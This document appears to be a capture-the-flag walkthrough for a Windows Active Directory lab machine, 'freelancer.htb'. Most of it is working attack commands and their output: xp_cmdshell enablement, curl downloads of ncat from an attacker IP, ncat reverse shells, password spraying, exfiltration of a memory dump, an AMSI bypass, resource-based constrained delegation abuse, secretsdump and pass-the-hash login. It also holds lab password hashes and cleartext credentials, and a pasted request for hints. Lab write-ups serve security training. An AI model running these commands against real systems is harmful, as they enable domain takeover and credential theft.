TCP Scan

> TARGET=10.129.69.99 && nmap -p$(nmap -p- --min-rate=1000 -T4 $TARGET -Pn | grep ^[0-9] | cut -d '/' -f 1 | tr '\n' ',' | sed s/,$//) -sC -sV -Pn -vvv $TARGET -oN nmap_tcp_all.nmap

PORT      STATE SERVICE       REASON          VERSION
53/tcp    open  domain        syn-ack ttl 127 Simple DNS Plus
80/tcp    open  http          syn-ack ttl 127 nginx 1.25.5
|_http-title: Did not follow redirect to http://freelancer.htb/
|_http-server-header: nginx/1.25.5
| http-methods:
|_  Supported Methods: GET HEAD POST OPTIONS
88/tcp    open  kerberos-sec  syn-ack ttl 127 Microsoft Windows Kerberos (server time: 2024-06-02 03:28:45Z)
135/tcp   open  msrpc         syn-ack ttl 127 Microsoft Windows RPC
139/tcp   open  netbios-ssn   syn-ack ttl 127 Microsoft Windows netbios-ssn
389/tcp   open  ldap          syn-ack ttl 127 Microsoft Windows Active Directory LDAP (Domain: freelancer.htb0., Site: Default-First-Site-Name)
445/tcp   open  microsoft-ds? syn-ack ttl 127
464/tcp   open  kpasswd5?     syn-ack ttl 127
593/tcp   open  ncacn_http    syn-ack ttl 127 Microsoft Windows RPC over HTTP 1.0
636/tcp   open  tcpwrapped    syn-ack ttl 127
3268/tcp  open  ldap          syn-ack ttl 127 Microsoft Windows Active Directory LDAP (Domain: freelancer.htb0., Site: Default-First-Site-Name)
3269/tcp  open  tcpwrapped    syn-ack ttl 127
5985/tcp  open  http          syn-ack ttl 127 Microsoft HTTPAPI httpd 2.0 (SSDP/UPnP)
|_http-server-header: Microsoft-HTTPAPI/2.0
|_http-title: Not Found
9389/tcp  open  mc-nmf        syn-ack ttl 127 .NET Message Framing
49666/tcp open  msrpc         syn-ack ttl 127 Microsoft Windows RPC
49670/tcp open  ncacn_http    syn-ack ttl 127 Microsoft Windows RPC over HTTP 1.0
49671/tcp open  msrpc         syn-ack ttl 127 Microsoft Windows RPC
49672/tcp open  msrpc         syn-ack ttl 127 Microsoft Windows RPC
51703/tcp open  msrpc         syn-ack ttl 127 Microsoft Windows RPC
51707/tcp open  msrpc         syn-ack ttl 127 Microsoft Windows RPC
Service Info: Host: DC; OS: Windows; CPE: cpe:/o:microsoft:windows
|_    Message signing enabled and required
  • add host
echo '10.129.69.99    freelancer.htb' >> /etc/hosts

enum

> enum4linux freelancer.htb
Domain Name: FREELANCER
Domain Sid: S-1-5-21-3542429192-2036945976-3483670807

userenum

http://freelancer.htb/accounts/login/otp/Mgo=/65018e8fbb17e2fd5bd0d0982c8f92b7/
  • you are now logged in as the admin user johnHalond@freelancer.htb

foothold

  • go to /admin and execute the SQL command
SELECT * FROM INFORMATION_SCHEMA.TABLES;
pbkdf2_sha256$600000$IgjtPcBB9VySMPXoeAc8PL$pmpMU81uwwKvdxUBNVk/K4Wwh4pw/fWIseSx4XkyMJo=    admin
pbkdf2_sha256$600000$tip7FkNIoN7nKNTLckQuiY$Q6g1Qx0B8ul/qxGQ0hX4lYoHc3jxkrWaf3lZvNknfWU=    Camellia19970
pbkdf2_sha256$600000$x9n1jiojmHAAzp3RSfvh3A$UmFMGDpFb6Gjz1XHmqNoO2eH7+7kYFfrDahLkJGpoUo=    crista.W
pbkdf2_sha256$600000$R9zyIpTUoHWkY3OK9mDf80$Qzm3CzI3RN6sJ3c8Ntuif9hqjZCIe+J9DxQGgPgVc3I=    ItachiUchiha
pbkdf2_sha256$600000$4KqR8oqlwUMVVjZuzbz4Wu$2mdmIWr5SyIdLBngGve3pZyS1KaOO4+hlXgmxAeGtVs=    JohntheCarter
pbkdf2_sha256$600000$jP0nxcmm3rWlUWkf1xBqhE$mnABoJ2VkzyUi1LC+IuwjJZOs4/z6yqQG4tpJy1b86A=    Jonathon.R
pbkdf2_sha256$600000$n807xz2S84KMIXaCE1d8cd$HS+8AffbYcIHSXTE7LoYtTiJRAmAqrkq7o+RAqZDPys=    lisa.Ar
pbkdf2_sha256$600000$sLNgktJGLeN8BE9mzu7ZaH$dDbEJQWTdNGhw0xfJKzBvAhg+6Ag76WaXeFgjUKE89U=    Markos
pbkdf2_sha256$600000$BYsJKIsg3DqI3DxZ08AL5t$4NYhZbnmJY7qQOsZADGbdDZk5EyS7NBv0NVA21LKLs0=    martin1234
pbkdf2_sha256$600000$Vv05zVNTevRy9j29n3nnmC$WIrntfpqMYGv7x79UZtOXOLOmnskyHItdxKMzh0BPRY=    maya001
pbkdf2_sha256$600000$ItLrs0zNKnvHpa8x81YUET$znvkVByIaU8U+s41mE6RjOd9yrpe1DLBF/l76bMznwo=    Philippos
pbkdf2_sha256$600000$eyWcuxHnbIoONyvdQ3tZaM$TN4+gH91PqmpGSKpDZiivK1TqGbNfXErBEa558isebo=    SaraArkhader
pbkdf2_sha256$600000$ok26XbM8us6jrG4BvlsM6h$IZbj6fZzUIagbziFSpPP68olFK7yrUCFTAZmK7qo7co=    test
pbkdf2_sha256$600000$LCdispX2eABGjp4wQpAkZt$UqGIDDNd9Mnkoa8xMw3DTvW9x50JSV94OALXBNNtisw=    test1
pbkdf2_sha256$600000$6z0gkQxAgg6ttMJUL1MKLE$iDl9amRUgVNXxVAsUaPhjVKvqgS6i5EETFeFZKlr3e0=    tomHazard
  • upgrade the user to sysadmin
EXECUTE AS LOGIN = 'SA';
EXEC sp_addsrvrolemember 'Freelancer_webapp_user', 'sysadmin';
sp_configure 'Show Advanced Options', 1
RECONFIGURE
sp_configure 'xp_cmdshell', 1
RECONFIGURE
  • reverse shell
EXEC master..xp_cmdshell 'curl -s http://10.10.14.58/ncat.exe -o c:\Users\sql_svc\Desktop\ncat.exe'
EXEC master..xp_cmdshell 'curl -s http://10.10.14.58/libssl-3.dll -o c:\Users\sql_svc\Desktop\libssl-3.dll'
EXEC master..xp_cmdshell 'curl -s http://10.10.14.58/libcrypto-3.dll -o c:\Users\sql_svc\Desktop\libcrypto-3.dll'
EXEC xp_cmdshell 'c:\Users\sql_svc\Desktop\ncat.exe 10.10.14.58 4444 -e cmd.exe'

user: mikasaAckerman

  • found the password in
c:\Users\sql_svc\Downloads\SQLEXPR-2019_x64_ENU>type sql-Configuration.INI
type sql-Configuration.INI
[OPTIONS]
ACTION="Install"
QUIET="True"
FEATURES=SQL
INSTANCENAME="SQLEXPRESS"
INSTANCEID="SQLEXPRESS"
RSSVCACCOUNT="NT Service\ReportServer$SQLEXPRESS"
AGTSVCACCOUNT="NT AUTHORITY\NETWORK SERVICE"
AGTSVCSTARTUPTYPE="Manual"
COMMFABRICPORT="0"
COMMFABRICNETWORKLEVEL=""0"
COMMFABRICENCRYPTION="0"
MATRIXCMBRICKCOMMPORT="0"
SQLSVCSTARTUPTYPE="Automatic"
FILESTREAMLEVEL="0"
ENABLERANU="False"
SQLCOLLATION="SQL_Latin1_General_CP1_CI_AS"
SQLSVCACCOUNT="FREELANCER\sql_svc"
SQLSVCPASSWORD="IL0v3ErenY3ager"
SQLSYSADMINACCOUNTS="FREELANCER\Administrator"
SECURITYMODE="SQL"
SAPWD="t3mp0r@ryS@PWD"
ADDCURRENTUSERASSQLADMIN="False"
TCPENABLED="1"
NPENABLED="1"
BROWSERSVCSTARTUPTYPE="Automatic"
IAcceptSQLServerLicenseTerms=True
  • compose user and password lists
# users.txt
Administrator
alex.hill
carol.poland
d.jones
dthomas
ereed
Ethan.l
evelyn.adams
Guest
hking
jen.brown
jgreen
jmartinez
krbtgt
leon.sk
lkazanof
lorra199
maya.artmes
michael.williams
mikasaAckerman
olivia.garcia
samuel.turner
sdavis
sophia.h
sql_svc
SQLBackupOperator
sshd
taylor
wwalker

# passwords.txt
IL0v3ErenY3ager
t3mp0r@ryS@PWD
  • password spray
> crackmapexec smb freelancer.htb -u users.txt -p passwords.txt
SMB         freelancer.htb  445    DC               [+] freelancer.htb\mikasaAckerman:IL0v3ErenY3ager
.\RunasCs.exe mikasaAckerman IL0v3ErenY3ager cmd.exe -r 10.10.14.58:443

c:\Users\mikasaAckerman\Desktop>type user.txt
type user.txt
9971bcc8b11abfa6b6bb14e3fe00c1a3

user: lorra199

c:\Users\mikasaAckerman\Desktop>type mail.txt
Hello Mikasa,
I tried once again to work with Liza Kazanoff after seeking her help to troubleshoot the BSOD issue on the "DATACENTER-2019" computer. As you know, the problem started occurring after we installed the new update of SQL Server 2019.
I attempted the solutions you provided in your last email, but unfortunately, there was no improvement. Whenever we try to establish a remote SQL connection to the installed instance, the server's CPU starts overheating, and the RAM usage keeps increasing until the BSOD appears, forcing the server to restart.
Nevertheless, Liza has requested me to generate a full memory dump on the Datacenter and send it to you for further assistance in troubleshooting the issue.
Best regards,
  • re-upload ncat
curl http://10.10.14.58/ncat.exe -o c:\temp\ncat.exe
curl http://10.10.14.58/libssl-3.dll -o c:\temp\libssl-3.dll
curl http://10.10.14.58/libcrypto-3.dll -o c:\temp\libcrypto-3.dll
  • download the MEMORY.7z file
c:\temp\ncat.exe 10.10.14.58 6666 < MEMORY.7z
https://github.com/ufrisk/MemProcFS
This may be useful; then try to bypass AMSI and dump something.

Grab the 3 hives and dump the passwords
impacket-secretsdump -sam SAM.reghive -system SYSTEM.reghive -security SECURITY.reghive local

The entry labelled "Unknown User" is the password for lorra199. You can use RunasCs again or evil-winrm.

I'm currently stuck doing the dcsync.
I have created a new machine account with msds-allowedtoactonbehalfofotheridentity and can create a ccache ticket with getST.
But secretsdump keeps failing with STATUS_MORE_PROCESSING_REQUIRED.

Not sure if I'm doing something wrong or something is broken. I also keep having to sync clocks because of skew.
Any hints?

I have used this tool that somebody linked earlier:
https://github.com/ufrisk/MemProcFS

Then grabbed the ...MACHINE_SYSTEM.reghive etc. from registry\hive_files
  • login as lorra199
evil-winrm -i freelancer.htb -u lorra199 -p PWN3D#l0rr@Armessa199

user: liza.kazanof

  • list deleted objects
Get-ADObject -filter 'isdeleted -eq $true -and name -ne "Deleted Objects"' -includeDeletedObjects -property *

memberOf: {CN=Remote Management Users,CN=Builtin,DC=freelancer,DC=htb, CN=Backup Operators,CN=Builtin,DC=freelancer,DC=htb}
  • restore liza.kazanof, who is in the Backup Operators group
# get the guid of existing user
Get-ADObject -filter ' name -eq "Liza Kazanof"' -property *
# remove the existing user
remove-adobject -identity 501442ec-1e03-4451-949b-4770f98b7f52
# restore the deleted user
Restore-ADObject -identity ebe15df5-e265-45ec-b7fc-359877217138 -NewName liza.kazanof
# upload ncat
*Evil-WinRM* PS C:\temp> curl http://10.10.14.58/ncat.exe -o C:\temp\ncat.exe
*Evil-WinRM* PS C:\temp> curl http://10.10.14.58/libssl-3.dll -o C:\temp\libssl-3.dll
*Evil-WinRM* PS C:\temp> curl http://10.10.14.58/libcrypto-3.dll -o C:\temp\libcrypto-3.dll

$SecPassword = ConvertTo-SecureString 'RockYou!' -AsPlainText -Force
$Cred = New-Object System.Management.Automation.PSCredential('liza.kazanof', $SecPassword)
$session = New-PSSession -Credential $Cred
Invoke-Command -Session $session -scriptblock { c:\temp\ncat.exe 10.10.14.58 5555 -e powershell.exe }

root

$a = [Ref].Assembly.GetTypes() | ?{$_.Name -like '*siUtils'}
$b = $a.GetFields('NonPublic,Static') | ?{$_.Name -like '*siContext'}
[IntPtr]$c = $b.GetValue($null)
[Int32[]]$d = @(0xff)
[System.Runtime.InteropServices.Marshal]::Copy($d, 0, $c, 1)
curl http://10.10.14.58/PowerView.ps1 -o PowerView.ps1
curl http://10.10.14.58/PowerMad.ps1 -o PowerMad.ps1
Import-Module .\PowerView.ps1
Import-Module .\PowerMad.ps1
  • create a new attacker machine account
New-MachineAccount -MachineAccount attackersystem -Password $(ConvertTo-SecureString 'Summer2018!' -AsPlainText -Force)
$ComputerSid = Get-DomainComputer attackersystem -Properties objectsid | Select -Expand objectsid
$SD = New-Object Security.AccessControl.RawSecurityDescriptor -ArgumentList "O:BAD:(A;;CCDCLCSWRPWPDTLOCRSDRCWDWO;;;$($ComputerSid))"
$SDBytes = New-Object byte[] ($SD.BinaryLength)
$SD.GetBinaryForm($SDBytes, 0)
Get-DomainComputer DC | Set-DomainObject -Set @{'msds-allowedtoactonbehalfofotheridentity'=$SDBytes}
  • get a service ticket
rdate -n freelancer.htb && impacket-getST -spn 'cifs/dc.freelancer.htb' -impersonate 'Administrator' 'freelancer/attackersystem$:Summer2018!' -dc-ip dc.freelancer.htb
  • dump secrets
rdate -n freelancer.htb && KRB5CCNAME=Administrator@cifs_dc.freelancer.htb@FREELANCER.HTB.ccache impacket-secretsdump freelancer/administrator@dc.freelancer.htb -k -no-pass
  • login and get flag
evil-winrm -i dc.freelancer.htb -u administrator -H 0039318f1e8274633445bce32ad1a290

Evil-WinRM shell v3.5

Warning: Remote path completions is disabled due to ruby limitation: quoting_detection_proc() function is unimplemented on this machine

Data: For more information, check Evil-WinRM GitHub: https://github.com/Hackplayers/evil-winrm#Remote-path-completion

Info: Establishing connection to remote endpoint
*Evil-WinRM* PS C:\Users\Administrator\Documents> cd ..
*Evil-WinRM* PS C:\Users\Administrator> cd desktop
*Evil-WinRM* PS C:\Users\Administrator\desktop> ls


    Directory: C:\Users\Administrator\desktop


Mode                LastWriteTime         Length Name
----                -------------         ------ ----
-ar---         6/3/2024   7:30 AM             34 root.txt


ty*Evil-WinRM* PS C:\Users\Administrator\desktop> type root.txt
b69fbe378351f45e2414380b31d5c6e5
